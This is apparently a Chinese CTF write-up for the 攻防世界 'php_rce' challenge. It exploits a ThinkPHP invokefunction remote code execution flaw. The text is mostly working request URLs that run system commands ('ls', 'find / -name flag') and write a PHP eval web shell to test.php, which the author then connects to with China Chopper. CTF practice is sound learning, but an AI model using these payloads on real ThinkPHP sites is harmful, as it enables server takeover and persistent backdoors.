当前位置: 代码迷 >> 综合 >> 攻防世界 web php_rce emmm
  详细解决方案

攻防世界 web php_rce emmm

热度:95   发布时间:2023-12-09 19:28:51.0

漏洞原理
在这里插入图片描述

/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

在这里插入图片描述

在这里插入图片描述

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

在这里插入图片描述

最后= cat /flag

以上是直接find flag 有一点的碰运气 万一不是在/flag路径下呢

那么最稳妥的办法就是

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在这里插入图片描述
写入木马

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_p
ut_contents&vars[1][]=test.php&vars[1][]=<?php
highlight_file(__FILE__);@eval($_POST[sss]);?>

返回文件大小
在这里插入图片描述
菜刀去连 菜刀下载 使用方法
在这里插入图片描述
但是等了半天都没反应。。。。。突然发现可能不是这个
在这里插入图片描述